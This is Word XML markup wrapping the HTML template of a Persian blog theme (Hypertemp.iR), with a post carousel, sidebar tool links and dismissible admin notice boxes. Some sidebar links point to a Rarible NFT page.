    <w:p w14:paraId="020E2739" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;a title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>وب سايت ليگ قهرمانان آسيا</w:t>
      </w:r>
      <w:r>
        <w:t>" href="http://www.afcchampionsleague.com/en/news/" style="text-decoration: none;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7403619D" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;img src="http://festival.persiangig.com/image/persepolis/new_pers/afc.gif" border="0" height="40" width="40"&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C4AED0" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="547325D2" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:tab/>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607ED556" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCB1B3B" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t xml:space="preserve">&lt;/div&gt;        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E0A238" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="42BBF484" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t xml:space="preserve">            &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA0524E" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="048258D3" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t xml:space="preserve">&lt;/div&gt;    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17964C01" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Channel End--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEE826C" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="080E750E" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Category Posts Start--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAD4B77" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:Category_Posts_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C34E29A" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;aside class="owl-carousel"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E62DFF" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="707F79CF" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:Category_Posts_Loop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6570E2CC" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;div class="item" title="[Catgory_Title]"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B99BD4" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="bg"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099BE731" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="main"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D00E7BE" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="66C72C8D" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:Posts_Description_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020516D6" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="big"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1849BBA7" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:Posts_Image_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB0BA14" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;img src="[Post_Image]" class="photo"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DF7BE4" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;style&gt;.item[title="[Catgory_Title]"]{background:url('[Post_Image]') no-repeat scroll center center / cover;}&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA09F83" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/RB:Posts_Image_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06143B96" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="entery"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513E988C" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="title"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696F0F65" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;h2&gt;&lt;a href="[Post_Description_Link]" title="[Post_Description_Title]" rel="bookmark"&gt;[Post_Description_Title]&lt;/a&gt;&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AE7C0B" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;a href="[Catgory_Link]" rel="category" class="cat"&gt;[Catgory_Title]&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D9907C" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79889A65" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="0897FB1F" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="content rightheme-y"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4989936D" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;p&gt;[Post_Description]&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE99B28" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F23036" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t xml:space="preserve">&lt;div class="info"&gt;&lt;span&gt;&lt;i class="fa fa-clock-o"&gt;&lt;/i&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>به روزرسان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شده</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">!&lt;/span&gt;&lt;a href="[Post_Description_Link]" title="[Post_Description_Title]" rel="bookmark"&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>مطلب</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/a&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773069EC" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175C6891" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F243075" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/RB:Posts_Description_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A63D1AB" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="226F6CCF" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:Posts_Title_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27ADF2F4" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574E457E" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:List_Posts_Loop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CCDE38" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;li&gt;&lt;i class="fa fa-circle-o"&gt;&lt;/i&gt;&lt;a href="[Post_Link]" target="_blank" title="[Post_Title]" rel="bookmark"&gt;[Post_Title]&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E75F650" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/RB:List_Posts_Loop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E775187" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127F6244" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/RB:Posts_Title_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE98359" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="0860D377" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059D1F73" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CC407D" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D2E0B6" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/RB:Category_Posts_Loop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42039623" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="1EA38579" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/aside&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024434C0" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/RB:Category_Posts_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA8494C" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Category Posts End--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C10AE26" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="76F5A17F" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Main Start--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48418018" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;section class="main"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DBF568" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="786264B4" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Links Start--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BE49FE" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;aside class="best-links"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C29982D" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;a href="https://rarible.com/user/0xda6da9e544d3a526d8147fbdb2d5f7521e75ddc9/owned" target="_blank" title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>سفارش طراح</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ی</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">"&gt;&lt;i class="fa fa-wordpress"&gt;&lt;/i&gt;&lt;span&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>با 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لتر</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> شکن وارد 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 NFT&lt;/span&gt;&lt;/a&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BFB669" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;a href="" target="_blank" title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>سفارش طراح</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ی</w:t>
      </w:r>
      <w:r>
        <w:t>"&gt;&lt;i class="fa fa-code"&gt;&lt;/i&gt;&lt;span&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>سفارش طراح</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ی</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&lt;/span&gt;&lt;/a&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC5BF9A" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;a href=" https://rarible.com/user/0xda6da9e544d3a526d8147fbdb2d5f7521e75ddc9/owned " target="_blank" title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>سفارش سئو</w:t>
      </w:r>
      <w:r>
        <w:t>"&gt;&lt;i class="fa fa-signal"&gt;&lt;/i&gt;&lt;span&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>جذاب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  NFT &lt;/span&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0054282D" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t xml:space="preserve">&lt;a href="https://rarible.com/user/0xda6da9e544d3a526d8147fbdb2d5f7521e75ddc9/owned " target="_blank" rel="nofollow"&gt;&lt;i class="fa fa-paper-plane-o"&gt;&lt;/i&gt;&lt;span&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial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 NFT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>با 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t xml:space="preserve">&lt;/span&gt;&lt;/a&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379606C9" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;a href="http://www.hypertemp.ir/page/ghalebsaz" target="_blank" title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>قالب ساز انلا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>" class="tool"&gt;&lt;i class="fa fa-desktop"&gt;&lt;/i&gt;&lt;span&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>قالب ساز انلا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>&lt;/span&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118F2EF5" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;a href="http://www.hypertemp.ir/page/flat" target="_blank" title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>رنگ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فلت</w:t>
      </w:r>
      <w:r>
        <w:t>" class="tool center"&gt;&lt;i class="fa fa-eyedropper"&gt;&lt;/i&gt;&lt;span&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>رنگ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فلت</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&lt;/span&gt;&lt;/a&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D091803" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;a href="http://www.hypertemp.ir/page/qr" target="_blank" title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ساخت کد</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> qr" class="tool"&gt;&lt;i class="fa fa-qrcode"&gt;&lt;/i&gt;&lt;span&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ساخت کد</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> qr&lt;/span&gt;&lt;/a&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EB0EF9" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/aside&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AA1ECD" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Links End--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6C8F17" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="08BA3F7F" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Pms &amp; ads Start--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C22B251" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;aside class="pm-ad"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1FBCB3" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="7E96C876" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Pms Start--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799541DD" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="pms"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0CA3CF" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:Custom_Option_Block=1&gt;&lt;RB:Custom_Option_Title&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial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t>&lt;/RB:Custom_Option_Title&gt;&lt;div class="pm c-1" id="hyperadminnotic-a"&gt;&lt;p&gt;&lt;b&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial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t xml:space="preserve"> :&lt;/b&gt;&lt;RB:Custom_Option_Content&gt;  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>بــه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ما خوش آمد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  . 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دوارم</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> لحظات خوب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سپر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 . &lt;/RB:Custom_Option_Content&gt;&lt;/p&gt;&lt;div class="close" onclick="document.getElementById('hyperadminnotic-a').style.display='none';"&gt;&lt;i class="fa fa-close"&gt;&lt;/i&gt;&lt;/div&gt;&lt;/div&gt;&lt;/RB:Custom_Option_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F52505" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:Custom_Option_Block=2&gt;&lt;RB:Custom_Option_Title&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial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شنهاد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t>&lt;/RB:Custom_Option_Title&gt;&lt;div class="pm c-2" id="hyperadminnotic-b"&gt;&lt;p&gt;&lt;b&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial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شنهاد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t xml:space="preserve"> :&lt;/b&gt;&lt;RB:Custom_Option_Content&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>بخش اطلاع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2</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/RB:Custom_Option_Content&gt;&lt;/p&gt;&lt;div class="close" onclick="document.getElementById('hyperadminnotic-b').style.display='none';"&gt;&lt;i class="fa fa-close"&gt;&lt;/i&gt;&lt;/div&gt;&lt;/div&gt;&lt;/RB:Custom_Option_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589A3583" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:Custom_Option_Block=3&gt;&lt;RB:Custom_Option_Title&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>نکته مهم</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/RB:Custom_Option_Title&gt;&lt;div class="pm c-3" id="hyperadminnotic-c"&gt;&lt;p&gt;&lt;b&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>نکته مهم</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> :&lt;/b&gt;&lt;RB:Custom_Option_Content&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>بخش اطلاع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3</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/RB:Custom_Option_Content&gt;&lt;/p&gt;&lt;div class="close" onclick="document.getElementById('hyperadminnotic-c').style.display='none';"&gt;&lt;i class="fa fa-close"&gt;&lt;/i&gt;&lt;/div&gt;&lt;/div&gt;&lt;/RB:Custom_Option_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F03D6CE" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:Custom_Option_Block=4&gt;&lt;RB:Custom_Option_Title&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>اطلاع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t>&lt;/RB:Custom_Option_Title&gt;&lt;div class="pm c-4" id="hyperadminnotic-d"&gt;&lt;p&gt;&lt;b&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>اطلاع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t xml:space="preserve"> :&lt;/b&gt;&lt;RB:Custom_Option_Content&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>بخش اطلاع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4</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/RB:Custom_Option_Content&gt;&lt;/p&gt;&lt;div class="close" onclick="document.getElementById('hyperadminnotic-d').style.display='none';"&gt;&lt;i class="fa fa-close"&gt;&lt;/i&gt;&lt;/div&gt;&lt;/div&gt;&lt;/RB:Custom_Option_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41546C1C" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
